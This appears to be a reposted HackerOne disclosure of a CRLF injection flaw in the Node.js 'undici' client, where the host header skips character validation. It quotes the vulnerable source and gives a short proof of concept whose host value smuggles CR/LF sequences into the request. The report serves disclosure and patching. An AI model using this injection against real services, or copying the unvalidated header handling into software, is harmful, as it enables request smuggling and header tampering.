原文始发于Hackerone(timon8):CRLF Injection in Nodejs ‘undici’ via host
/**
 * Excerpt of the per-header handling quoted in the report; the remainder of
 * the function is elided at the `...` line below.
 *
 * @param {object} request - request being built; this excerpt reads and writes
 *   `request.host` and reads `request.contentLength`
 * @param {string} key - header name (its `.length` and `.toLowerCase()` are used)
 * @param {*} val - header value supplied by the caller
 * @throws {InvalidArgumentError} when `val` is a truthy non-array object
 */
function processHeader (request, key, val) {
// Only the value's type is checked here: a non-array object is rejected,
// while strings and arrays continue. Nothing in this check looks at the
// characters inside a string value.
if (val && (typeof val === 'object' && !Array.isArray(val))) {
throw new InvalidArgumentError(`invalid ${key} header`)
} else if (val === undefined) {
// An undefined value means there is nothing to process for this key.
return
}
// First `host` header (matched case-insensitively) while request.host is still unset.
if (
request.host === null &&
key.length === 4 &&
key.toLowerCase() === 'host'
) {
// Consumed by Client
// The value is stored as supplied. As the report points out, this branch
// does not run headerCharRegex.exec(val), so CR/LF characters in `val`
// are kept in request.host.
// NOTE(review): the fix direction is to apply the header-character check
// before this assignment and throw InvalidArgumentError on a mismatch;
// confirm against the patched release.
request.host = val
} else if (
request.contentLength === null &&
...
import { request } from 'undici'
// Reproduction case from the report. The value below stands in for
// caller-controlled input that reaches the `host` header; it contains CR/LF
// sequences, which a header value must never carry.
const unsanitizedHostInput = '12 \r\n\r\naaa:aaa';

const requestOptions = {
  method: 'GET',
  headers: {
    'content-type': 'application/json',
    host: unsanitizedHostInput,
  },
};

// Per the report, affected versions (<= undici@5.14.0) accept this `host`
// value without header-character validation. A client that validates header
// values should reject the call before anything is sent. Applications should
// also refuse CR/LF in any input they place into request headers.
const response = await request('http://127.0.0.1:23333', requestOptions);
const { statusCode, headers, trailers, body } = response;

console.log('response received', statusCode);
console.log('headers', headers);

// Drain the response body chunk by chunk before reading the trailers.
for await (const chunk of body) {
  console.log('data', chunk);
}

console.log('trailers', trailers);
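Impact:
Affected versions: undici <= 5.14.0 (`<=undici@5.14.0`). An application that passes untrusted input as the `host` request header is exposed to CRLF injection into the outgoing request.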